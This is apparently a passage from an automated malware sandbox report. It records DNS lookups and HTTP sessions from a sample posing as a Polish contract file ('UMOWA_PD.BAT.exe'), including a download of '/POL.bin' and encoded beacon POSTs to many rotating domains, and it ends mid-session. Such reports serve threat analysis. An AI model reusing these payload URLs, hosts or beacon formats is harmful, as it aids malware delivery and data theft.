                                                                                  Sep 25, 2024 09:55:54.276148081 CEST1.1.1.1192.168.11.200xcdfcNo error (0)dfmagazine.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:08.289079905 CEST1.1.1.1192.168.11.200xfd44No error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:22.146852970 CEST1.1.1.1192.168.11.200xc1e7No error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:36.075088024 CEST1.1.1.1192.168.11.200x5943No error (0)www.typ67.toptyp67.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:36.075088024 CEST1.1.1.1192.168.11.200x5943No error (0)typ67.top38.47.207.146A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)www.greekhause.orggreekhause.orgCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)greekhause.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:56:50.749984026 CEST1.1.1.1192.168.11.200x6e7eNo error (0)greekhause.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:05.058903933 CEST1.1.1.1192.168.11.200x70bNo error (0)www.dorikis.online162.213.249.216A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)www.platinumkitchens.infoplatinumkitchens.infoCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)platinumkitchens.info3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:19.529452085 CEST1.1.1.1192.168.11.200xce86No error (0)platinumkitchens.info15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)www.dhkatp.vipdhkatp.vipCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)dhkatp.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:32.815990925 CEST1.1.1.1192.168.11.200xab8bNo error (0)dhkatp.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:46.157201052 CEST1.1.1.1192.168.11.200x93b5No error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:57:46.157201052 CEST1.1.1.1192.168.11.200x93b5No error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:01.752358913 CEST1.1.1.1192.168.11.200x5c5fNo error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:01.752358913 CEST1.1.1.1192.168.11.200x5c5fNo error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)www.dxeg.lola22.dxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)a22.dxzz.topdxzz.topCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:16.110465050 CEST1.1.1.1192.168.11.200x623aNo error (0)dxzz.top137.175.33.56A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                  Sep 25, 2024 09:58:29.864520073 CEST1.1.1.1192.168.11.200x521cNo error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • bestpack.ee
                                                                                  • www.inastra.online
                                                                                  • www.invicta.world
                                                                                  • www.whats-in-the-box.org
                                                                                  • www.linkwave.cloud
                                                                                  • www.dfmagazine.shop
                                                                                  • www.ngmr.xyz
                                                                                  • www.albero-dveri.online
                                                                                  • www.typ67.top
                                                                                  • www.greekhause.org
                                                                                  • www.dorikis.online
                                                                                  • www.platinumkitchens.info
                                                                                  • www.dhkatp.vip
                                                                                  • www.tempatmudisini01.click
                                                                                  • www.komart.shop
                                                                                  • www.dxeg.lol
                                                                                  • www.tukaari.shop

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.2049755185.86.211.137802788C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:54:23.896635056 CEST163OUTGET /POL.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Host: bestpack.ee
                                                                                  Cache-Control: no-cache
                                                                                  Sep 25, 2024 09:54:24.114934921 CEST427INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 25 Sep 2024 07:54:24 GMT
                                                                                  Server: Apache
                                                                                  Location: https://bestpack.ee/POL.bin
                                                                                  Content-Length: 235
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 73 74 70 61 63 6b 2e 65 65 2f 50 4f 4c 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://bestpack.ee/POL.bin">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.11.2049757208.91.197.27803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:54:57.764991999 CEST548OUTGET /ewr1/?Xb3xI=yez6Hf8Nj9Hz2QzY0/kGZkWHaPFJ5S6eHe7u1tM28nyQurG92QfHcGFdjgIUViF/gPksZ2ZTtaNFMQ6yCGD+tVTZAN9QT6lG744IlGnILDcgbby9ijaATPk=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.inastra.online
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:03.457561970 CEST616INHTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:54:57 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  Sep 25, 2024 09:55:03.457662106 CEST567INData Raw: 34 66 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4c 71 75 44
                                                                                  Data Ascii: 4f42<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_Xwe1Sa8pJ4vP/is2A94QKK4aTuY6hmn34W4d9thqAAnLGjqwQCYyOUTe4VAT0TBDRgddN
                                                                                  Sep 25, 2024 09:55:03.457737923 CEST1220INData Raw: 6e 67 65 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 32 35 35 2c 32 35 35 29 3b 0a 7d 0a 0a 23 73 61 6c 65 5f 62 61 6e 6e 65 72 5f 6f 72 61 6e 67 65 5f 77 69 64 65 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73
                                                                                  Data Ascii: nge a { color: rgb(255,255,255);}#sale_banner_orange_wide {background-position: bottom;background-color: #E57921;padding: 18px 0;text-align: center;font-family: sans-serif;font-size: 14px;}#sale_banner_orange_wide a {col
                                                                                  Sep 25, 2024 09:55:03.457815886 CEST1220INData Raw: 61 67 6f 6e 61 6c 5f 6f 72 61 6e 67 65 20 7b 0a 09 68 65 69 67 68 74 3a 35 30 70 78 3b 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 35 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 09 66 6f 6e 74 2d
                                                                                  Data Ascii: agonal_orange {height:50px;line-height:25px;text-transform:uppercase;font-family:'Port Lligat Slab',sans-serif;font-weight:lighter; text-align:center; z-index: 20;}#sale_diagonal_orange a {display:block;height:100%;color
                                                                                  Sep 25, 2024 09:55:03.599057913 CEST1220INData Raw: 20 32 34 70 78 3b 0a 09 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 70 61 64 64 69 6e 67 3a 20 38 70 78 20 30 20 30 20 38 70 78 3b 0a 09 6d 61 72 67 69 6e 3a 31 30 70 78 20 61 75 74 6f 3b
                                                                                  Data Ascii: 24px;height: 24px;background: #fff;padding: 8px 0 0 8px;margin:10px auto;-webkit-border-radius: 4px;-moz-border-radius: 4px;border-radius: 4px;}</style> <style media="screen">* { margin: 0; box-sizing: content-box;}b
                                                                                  Sep 25, 2024 09:55:03.599160910 CEST1220INData Raw: 2c 0a 61 3a 61 63 74 69 76 65 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 36 32 36 35 37 34 3b 0a 7d 0a 0a 23 73 61 6c 65 5f 6c 69 6e 6b 20 61 2c 0a 23 73 61 6c 65 5f 6c 69 6e 6b 5f 62 65 6c 6f 77 20 61 2c 0a 23 73 61 6c 65 5f 6c 69 6e 6b 5f 62 6f 6c
                                                                                  Data Ascii: ,a:active { color: #626574;}#sale_link a,#sale_link_below a,#sale_link_bold a { color: #9a9dad;}</style> <style media="screen">.fallback-term-holder { display: inline-grid; grid-template-columns: 1fr; width: 100%;
                                                                                  Sep 25, 2024 09:55:03.599225044 CEST1220INData Raw: 67 78 4d 7a 49 69 4c 7a 34 4b 49 43 41 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 49 44 49 75 4d 44 45 73 4d 6a 45 67 4d 6a 4d 73 4d 54 49 67 4d 69 34 77 4d 53 77 7a 49 48 59 67 4d 43 42 73 49 44 55 75 4e 54 59 78 4e 44 49 34 4e 53 77 35 4c 6a 4d 31
                                                                                  Data Ascii: gxMzIiLz4KICA8cGF0aCBkPSJNIDIuMDEsMjEgMjMsMTIgMi4wMSwzIHYgMCBsIDUuNTYxNDI4NSw5LjM1NzE0MyB6IiBpZD0icGF0aDEzNCIvPgo8L3N2Zz4=');}</style> </head><body id="afd"><main> <div class="bgHolder"> <div style="padding-bottom: .5em; p
                                                                                  Sep 25, 2024 09:55:03.603563070 CEST1220INData Raw: 61 6c 65 5f 6c 69 6e 6b 5f 62 6f 6c 64 2c 0a 23 73 61 6c 65 5f 6c 69 6e 6b 5f 62 65 6c 6f 77 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 30 2c 30 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 20 20
                                                                                  Data Ascii: ale_link_bold,#sale_link_below { color: rgb(0,0,0); text-align: right; font: 14px arial, sans-serif; height: 20px; padding: 10px 0 5px 0; width: 900px; margin: 0 auto; z-index: 20;}#sale_link a,#sale_link_be
                                                                                  Sep 25, 2024 09:55:03.740366936 CEST1220INData Raw: 65 64 3b 0a 09 09 72 69 67 68 74 3a 2d 31 32 30 70 78 3b 0a 09 09 74 6f 70 3a 34 32 70 78 3b 0a 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 0a 09 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 32 30 3b 0a 09 7d 0a 0a 09 23 73 61 6c 65 5f 64
                                                                                  Data Ascii: ed;right:-120px;top:42px;line-height:20px; z-index: 20;}#sale_diagonal_orange a {-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);-o-transform: rotate(45deg);-ms-transform: rotate(45deg);transfor
                                                                                  Sep 25, 2024 09:55:03.740401030 CEST1220INData Raw: 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 6d 61 69 6e 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2e 73 61 6c 65 5f 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 30 2c 30 2c 30 29 3b 0a 20 20 20 20 20 20
                                                                                  Data Ascii: iv> </div></main><style> .sale_link { color: rgb(0,0,0); text-align: right; font: 14px arial, sans-serif; height: 20px; padding: 10px 0 5px 0; width: 900px; max-width:96%;
                                                                                  Sep 25, 2024 09:55:03.745310068 CEST1220INData Raw: 74 3c 2f 61 3e 0a 3c 62 72 3e 3c 62 72 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 74 77 6f 72 6b 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 22 3e 4c 65 67 61 6c 20 4e 6f 74 69 63 65 3c 2f 61 3e 0a 3c 62 72 2f 3e 3c
                                                                                  Data Ascii: t</a><br><br><a href="https://www.networksolutions.com/">Legal Notice</a><br/><br/></footer></body><script type="text/javascript" language="JavaScript"> var tcblock = { // Required and steady 'container': 'tc',


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.11.204975813.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:14.348584890 CEST813OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 202
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 59 72 68 6a 6d 34 2b 75 44 55 64 34 57 77 75 36 45 71 67 57 4e 75 57 65 6e 52 70 6b 43 2b 47 43 4e 4d 79 6b 6b 68 49 4c 48 44 4e 36 30 39 54 6c 41 65 51 50 68 36 5a 69 59 67 53 4e 4a 30 6c 48 62 6c 5a 36 35 4a 74 65 35 48 53 71 42 41 55 31 39 62 30 6b 6e 58 6e 7a 72 2b 6f 78 73 6c 63 31 67 4e 6c 6b 35 79 74 33 47 72 6c 2b 72 4d 77 44 6c 33 4a 2b 70 4f 2b 6f 7a 37 33 67 74 78 41 2b 62 4c 2f 37 45 42 37 67 65 7a 30 6c 6d 38 4f 50 6e 35 2b 30 65 4c 72 77 61 76 62 36 38 62 38 50 6c 6d 56 51 52 4e 49 49 63 79 61 62 2b 69 4f 53 38 32 6a 52 73 67 3d 3d
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYYrhjm4+uDUd4Wwu6EqgWNuWenRpkC+GCNMykkhILHDN609TlAeQPh6ZiYgSNJ0lHblZ65Jte5HSqBAU19b0knXnzr+oxslc1gNlk5yt3Grl+rMwDl3J+pO+oz73gtxA+bL/7EB7gez0lm8OPn5+0eLrwavb68b8PlmVQRNIIcyab+iOS82jRsg==


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.11.204975913.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:16.985219955 CEST833OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 222
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 53 43 4b 73 43 6b 6c 6b 6b 4c 4b 6a 4e 36 38 64 54 6b 4e 2b 52 69 68 36 64 41 59 6b 53 4e 4a 31 42 48 62 6b 70 36 34 2b 5a 66 34 58 53 73 4d 67 55 7a 69 72 30 6b 6e 58 6e 7a 72 39 55 66 73 6c 55 31 67 64 56 6b 72 57 78 32 59 37 6c 78 68 73 77 44 68 33 4a 36 70 4f 2f 39 7a 2f 58 4f 74 7a 49 2b 62 50 37 37 41 41 37 6e 48 6a 30 2f 73 63 50 63 68 70 37 34 65 2f 65 4e 63 49 37 78 31 35 31 79 70 51 45 4b 4d 2f 38 73 66 68 47 70 36 53 33 36 2b 30 69 4b 78 73 69 77 61 6e 37 2f 6b 69 50 63 62 2b 44 33 37 63 4e 37 51 66 73 3d
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.11.204976013.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:19.625036955 CEST7982OUTPOST /tcs6/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Origin: http://www.invicta.world
                                                                                  Referer: http://www.invicta.world/tcs6/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 4b 43 4b 65 4b 6b 6a 44 51 4c 4c 6a 4e 36 79 39 54 68 4e 2b 52 61 68 36 6c 45 59 6b 57 37 4a 33 4a 48 61 47 52 36 74 38 78 66 78 58 53 73 46 41 55 32 39 62 31 2b 6e 58 33 33 72 2b 73 66 73 6c 55 31 67 62 52 6b 75 79 74 32 61 37 6c 2b 72 4d 77 50 6c 33 4a 53 70 50 61 4b 7a 2b 58 77 74 44 6f 2b 62 76 72 37 47 69 54 6e 50 6a 30 35 76 63 4f 62 68 6f 47 36 65 2b 33 30 63 49 6d 6d 31 36 46 79 71 47 6c 78 49 4c 49 4f 64 53 43 6c 31 52 48 4b 32 58 37 5a 79 50 37 4c 4c 57 66 2f 75 57 44 75 62 38 4c 46 2b 4d 35 6b 4a 66 53 36 71 45 59 38 45 61 6e 30 58 66 73 77 69 7a 65 73 52 64 54 55 36 4d 59 6e 4d 6e 36 51 38 63 61 63 33 65 51 59 54 6d 78 57 47 6e 64 6f 6f 46 32 34 4a 62 77 2f 4e 72 7a 51 6e 67 72 74 55 55 57 61 56 75 65 51 6e 38 74 34 35 65 38 55 65 4c 38 72 7a 39 70 55 77 4c 51 7a 4d 55 4c 4b 4a 34 6c 76 52 67 4b 58 31 63 48 2b 55 64 4e 43 58 77 36 65 75 33 51 69 [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMKCKeKkjDQLLjN6y9ThN+Rah6lEYkW7J3JHaGR6t8xfxXSsFAU29b1+nX33r+sfslU1gbRkuyt2a7l+rMwPl3JSpPaKz+XwtDo+bvr7GiTnPj05vcObhoG6e+30cImm16FyqGlxILIOdSCl1RHK2X7ZyP7LLWf/uWDub8LF+M5kJfS6qEY8Ean0XfswizesRdTU6MYnMn6Q8cac3eQYTmxWGndooF24Jbw/NrzQngrtUUWaVueQn8t45e8UeL8rz9pUwLQzMULKJ4lvRgKX1cH+UdNCXw6eu3QiGAquazuC98MrBy1VHbVHkM7ulofYY251dbT6iygXqBeYQCqxnPotM1c8CwJbWSWv2ihn31C2ZOwiv8xL0yQ5YqwfDBJUA57ItDEjqmusA2Pur4cTV0JyXIT/D9LNZcCmlCEUJliehmmtkeixWiFs+zAiOs7MVI4FsVwIRdUF/nFtm9xuHe3iFk1Zkywm3AM4V9wvoOfHPKRvgQbOfClHNjh5pAmqL316oYMjKoO6heyUOu/st3E1HWFxTh5XfOHMnXVFr8Y4gh5pmsC8XtyoNBlViHX02hMVRY3olu2oAFLzlC7krCFABnHVUVfLxB3B99xnwYVxNjKrtz5cj/GYKzsfRz2fEmdKKEzwWpYLkL0S68KfA1wwUj4lkCrAoWn5aBtbF5GzQpqLVg4OgM/OcQhZ37SMkFmuOSydHdDcWemM8BjAOurMG3OVO0UrZGGjMY8vUM/ZXtohv6jZcifQW1dTh19KTQ0n03svlzKNEzhF2k71lSJajhGFCt1rL6yf7+X7aPj7upe+sUFwz2wfcVnCv3uU8DYWsKClUXzBFJoUTWmkJ9fcdyyZEkN6JLF1/DX5qjZb9bHBUCaGZJelQbtylC8PmjKjQPRAV6QWKVf1ixiT4zT0+Q9GOifLyteoSJ8tT8tG4vYhKMKoyTqZEDaf6RvDeaNBxs [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.11.204976113.248.169.48803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:22.264098883 CEST547OUTGET /tcs6/?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.invicta.world
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 09:55:22.369791985 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 07:55:22 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 62 33 78 49 3d 55 54 72 32 56 51 4d 56 61 4e 6b 6e 41 50 68 76 38 70 4f 35 48 55 74 2f 61 53 44 2f 4f 75 41 76 59 66 75 66 6f 6e 78 57 63 75 7a 71 4b 59 7a 6a 74 30 30 45 53 48 4e 4f 70 38 4f 5a 64 34 4e 59 70 50 68 59 41 68 4b 45 66 46 42 79 41 6c 39 2f 77 2b 46 63 75 6d 47 58 4f 46 70 35 38 4d 4d 44 68 56 50 71 6b 39 35 36 34 6b 78 4e 38 4f 63 38 6b 57 30 38 4e 2b 73 3d 26 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Xb3xI=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&O4bP=9dRH6ZfHbJX"}</script></head></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.11.20497623.33.130.190803276C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 09:55:27.670301914 CEST834OUTPOST /bqye/ HTTP/1.1
